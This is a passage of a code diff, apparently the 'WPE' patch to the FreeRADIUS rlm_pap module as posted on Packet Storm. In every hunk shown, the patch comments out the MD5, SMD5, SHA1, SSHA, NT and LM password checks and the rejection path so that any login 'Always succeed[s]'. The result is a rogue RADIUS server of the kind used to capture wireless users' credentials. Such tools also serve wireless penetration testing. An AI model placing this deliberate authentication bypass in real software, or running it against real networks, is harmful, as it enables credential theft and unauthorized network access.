DEBUG("rlm_pap: User authenticated successfully");
return RLM_MODULE_OK;
@@ -618,10 +625,13 @@
fr_MD5Update(&md5_context, request->password->vp_octets,
request->password->length);
fr_MD5Final(digest, &md5_context);
+ /* WPE - Always succeed */
+ /*
if (memcmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: MD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -645,10 +655,13 @@
/*
* Compare only the MD5 hash results, not the salt.
*/
+ /* WPE - always succeed */
+ /*
if (memcmp(digest, vp->vp_octets, 16) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SMD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -667,10 +680,13 @@
fr_SHA1Update(&sha1_context, request->password->vp_octets,
request->password->length);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE - Always succeed */
+ /*
if (memcmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SHA1 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -691,10 +707,13 @@
request->password->length);
fr_SHA1Update(&sha1_context, &vp->vp_octets[20], vp->length - 20);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE - Always succeed */
+ /*
if (memcmp(digest, vp->vp_octets, 20) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SSHA password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -716,11 +735,14 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE - Always succeed */
+ /*
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(memcmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: NT password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -741,16 +763,22 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE - Always succeed */
+ /*
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(memcmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: LM password check failed");
+ */
+
make_msg:
+ /*
DEBUG("rlm_pap: Passwords don't match");
module_fmsg_vp = pairmake("Module-Failure-Message",
module_fmsg, T_OP_EQ);
pairadd(&request->packet->vps, module_fmsg_vp);
return RLM_MODULE_REJECT;
}
+ */
goto done;
break;
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!